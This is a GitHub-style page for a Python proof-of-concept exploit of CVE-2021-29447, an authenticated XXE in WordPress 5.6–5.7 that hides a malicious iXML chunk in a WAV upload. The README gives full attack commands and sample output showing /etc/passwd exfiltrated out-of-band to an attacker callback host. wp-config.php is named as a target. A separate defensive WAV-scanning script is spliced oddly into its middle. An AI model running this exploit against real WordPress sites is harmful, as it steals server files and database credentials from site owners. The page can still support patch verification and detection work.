
CVE-2021-29447 PoC — WordPress Authenticated XXE attack when installation is running PHP 8

Associated Vulnerability
Title: WordPress Authenticated XXE attack when installation is running PHP 8 (CVE-2021-29447)
Description: WordPress is an open source CMS. A user with the ability to upload files (like an Author) can exploit an XML parsing issue in the Media Library leading to XXE attacks. This requires the WordPress installation to be using PHP 8. Access to internal files is possible in a successful XXE attack. This has been patched in WordPress version 5.7.1, along with the older affected versions via a minor release. We strongly recommend you keep auto-updates enabled.
Description: PoC to exploit WordPress 5.6–5.7 (PHP 8+) authenticated XXE injection.
Readme
# CVE-2021-29447 Authenticated XXE Exploit for WordPress 🎯

A Python PoC to exploit the authenticated XXE vulnerability (CVE-2021-29447) in WordPress versions 5.6–5.7 via **WAV metadata**. It abuses the iXML chunk in WAV files to trigger an **Out-of-Band (OOB) exfiltration** of sensitive data—like `/etc/passwd`, `wp-config.php`, and more—straight into your `dump/` directory.

---

## How It Works 🔍

This script leverages an **XML External Entity (XXE)** flaw in how WordPress parses WAV metadata:

1. **WAV Creation**: Generates a malicious WAV file embedding an iXML chunk that references a remote DTD on your machine.
2. **DTD Hosting**: Spins up an HTTP server (or uses your own) to serve the crafted DTD, which instructs WordPress to read & Base64-encode a target file (e.g., `/etc/passwd`).
3. **File Upload**: Authenticates to WordPress, retrieves the media-upload nonce, and uploads the WAV via the Media Library.
4. **OOB Exfiltration**: WordPress parses the WAV, fetches the DTD, then performs a callback to your server containing the Base64 data. The script decodes it and writes it to `dump/`.
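A defensive counterpart to the mechanism above, added here as an example and not part of this PoC: a stdlib-only scanner that walks the RIFF chunks of an uploaded WAV and flags an iXML chunk carrying a DOCTYPE or entity declaration, which legitimate iXML metadata never needs. The function names, indicator set and the constructed sample WAVs are this example's own, not taken from the tool or from WordPress.

```python
import re
import struct

# Markers of a DTD with external references inside an XML document (hypothetical detection set).
XXE_PATTERNS = {
    "doctype": re.compile(rb"<!DOCTYPE", re.I),
    "entity_decl": re.compile(rb"<!ENTITY", re.I),
    "external_id": re.compile(rb"\b(SYSTEM|PUBLIC)\b"),
    "param_entity_ref": re.compile(rb"%[A-Za-z_][\w.-]*;"),
}

def iter_riff_chunks(data: bytes):
    """Yield (chunk_id, payload) for every top-level chunk of a RIFF/WAVE file."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        raise ValueError("not a RIFF/WAVE file")
    pos = 12
    while pos + 8 <= len(data):
        cid = data[pos:pos + 4]
        size = struct.unpack("<I", data[pos + 4:pos + 8])[0]
        yield cid, data[pos + 8:pos + 8 + size]
        pos += 8 + size + (size & 1)  # chunks are word-aligned: skip the pad byte after an odd size

def scan_wav_for_xxe(data: bytes) -> dict:
    """Report whether the WAV carries an iXML chunk and which DTD/entity markers appear in it."""
    result = {"has_ixml": False, "indicators": []}
    for cid, payload in iter_riff_chunks(data):
        if cid == b"iXML":
            result["has_ixml"] = True
            result["indicators"] = [n for n, rx in XXE_PATTERNS.items() if rx.search(payload)]
    # Well-formed iXML metadata never needs a DOCTYPE; its presence alone is enough to quarantine the upload.
    result["suspicious"] = bool({"doctype", "entity_decl"} & set(result["indicators"]))
    return result

def build_wav(ixml: bytes) -> bytes:
    """Build a minimal WAV (fmt + iXML + empty data chunk); constructed test input, not a real recording."""
    def chunk(cid: bytes, payload: bytes) -> bytes:
        return cid + struct.pack("<I", len(payload)) + payload + (b"\x00" if len(payload) & 1 else b"")
    fmt = struct.pack("<HHIIHH", 1, 1, 8000, 16000, 2, 16)  # PCM, mono, 8 kHz, 16-bit
    body = b"WAVE" + chunk(b"fmt ", fmt) + chunk(b"iXML", ixml) + chunk(b"data", b"")
    return b"RIFF" + struct.pack("<I", len(body)) + body

# Constructed samples: ordinary iXML metadata, and the same metadata preceded by a DOCTYPE pointing at a remote DTD.
BENIGN_IXML = b'<?xml version="1.0"?><BWFXML><PROJECT>demo</PROJECT></BWFXML>'
SUSPICIOUS_IXML = (b'<?xml version="1.0"?><!DOCTYPE BWFXML SYSTEM "http://dtd.example/x.dtd">'
                   b'<BWFXML><PROJECT>demo</PROJECT></BWFXML>')

if __name__ == "__main__":
    for label, ixml in (("benign", BENIGN_IXML), ("suspicious", SUSPICIOUS_IXML)):
        print(label, scan_wav_for_xxe(build_wav(ixml)))
```

Running the scanner at upload time (or over `wp-content/uploads/` after the fact) gives a cheap pre-parse gate independent of which PHP/libxml version the site runs.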

---

## Key Features ⚡

- **Interactive Mode** (`-i`): Prompt for file paths until `CTRL+C`—great for ad-hoc exploration.
- **Wordlist Mode** (`-w <file>`): Batch process dozens of file paths from a list.
- **Skip HTTP Server** (`--no-http`): Use your own webserver instead of the built-in one.
- **Debug Mode** (`--debug`): See detailed HTTP & internal debug logs.
- **Clean, Colored Logs**: Prefixed labels—`[CONFIG]`, `[UPLOAD]`, `[DUMP]`, `[WARN]`, `[ERROR]`—for quick status checks.
- **Configurable Timeout**: Wait up to **6 seconds** for each exfil before continuing.

---

## Installation 🛠️

1. **Clone** the repository:
   ```bash
   git clone https://github.com/Tea-On/CVE-2021-29447-Authenticated-XXE-WordPress-5.6-5.7.git
   cd CVE-2021-29447-Authenticated-XXE-WordPress-5.6-5.7
   ```
2. **Install** the Python dependency:
   ```bash
   pip3 install requests
   ```

---

## 🧾 Argument Reference

| Argument            | Required | Description                                                    |
|---------------------|----------|----------------------------------------------------------------|
| `-H, --host`        | ✅       | Local host/IP for serving DTD and receiving callbacks          |
| `-p, --port`        | ✅       | Local port for HTTP server                                     |
| `-u, --user`        | ✅       | WordPress username with upload permissions                     |
| `-P, --pass`        | ✅       | WordPress password                                             |
| `-d, --domain`      | ✅       | Target WordPress URL (include `http://`)                       |
| `-w, --wordlist`    | ❌       | File containing newline-separated paths to fetch               |
| `-i, --interactive` | ❌       | Prompt for file paths interactively                            |
| `--no-http`         | ❌       | Skip starting the built-in HTTP server                         |
| `--debug`           | ❌       | Enable debug logs (verbose HTTP & internal details)            |


---

## Example Usage 💥

#### Interactive Mode
```bash
python3 exploit_CVE-2021-29447.py \
  -H 10.10.14.8 -p 8080 \
  -u admin -P p@ssw0rd \
  -d http://vulnerable.local -i
```
```
[CONFIG] Interactive mode (CTRL+C to exit)
File> /etc/passwd
[CONFIG] DTD written: dtd/L2V0Yy9wYXNzd2Q=.dtd
[CONFIG] WAV built
[INFO] Nonce: d87f00a552
[DUMP] Dumped: dump/passwd
[UPLOAD] Upload ok (200)
[UPLOAD] URL: http://vulnerable.local/wp-content/uploads/payload.wav
File>
```

#### Wordlist Mode
```bash
python3 exploit_CVE-2021-29447.py \
  -H 10.10.14.8 -p 8080 \
  -u admin -P p@ssw0rd \
  -d http://vulnerable.local -w wordlist.txt
```
```
[CONFIG] Loaded 4 paths from "wordlist.txt"
[CONFIG] Using HTTP server at 10.10.14.8:8080
[CONFIG] Starting batch exfiltration...
[DUMP] [/etc/passwd] → dump/passwd
[WARN] No exfil for /etc/hostname within 6s, continuing
[UPLOAD] Upload ok (200)
[ERROR] Upload fail (502) on "/nonexistent"
```

#### No-Server & Debug
```bash
python3 exploit_CVE-2021-29447.py \
  -H 10.10.14.8 -p 8080 \
  -u admin -P p@ssw0rd \
  -d http://vulnerable.local --no-http --debug -w wordlist.txt
```
> Use your own HTTP server to host `dtd/` and capture callbacks. Debug logs appear as `[DEBUG]`.

---

## Output Directories 📂

- `dtd/` – Generated DTD files served to the target.
- `dump/` – Decoded file contents, named after the original path.

---

## Tips & Tricks 💡

- **Adjust Timeout**: Change the `EXFIL_TIMEOUT` variable (default 6s) for slow networks.
- **Use Debug**: Enable `--debug` to diagnose issues with auth, upload, or callbacks.

---

## Responsible Disclosure & License 🔐

**Only use this tool on systems you own or have explicit permission to test.**

Licensed under the [MIT License](LICENSE). Contributions welcome—let’s keep hacking **ethical** and **fun**! ✨
File Snapshot

├── [ 10K] exploit_CVE-2021-29447.py
├── [1.0K] LICENSE
└── [4.9K] README.md
0 directories, 3 files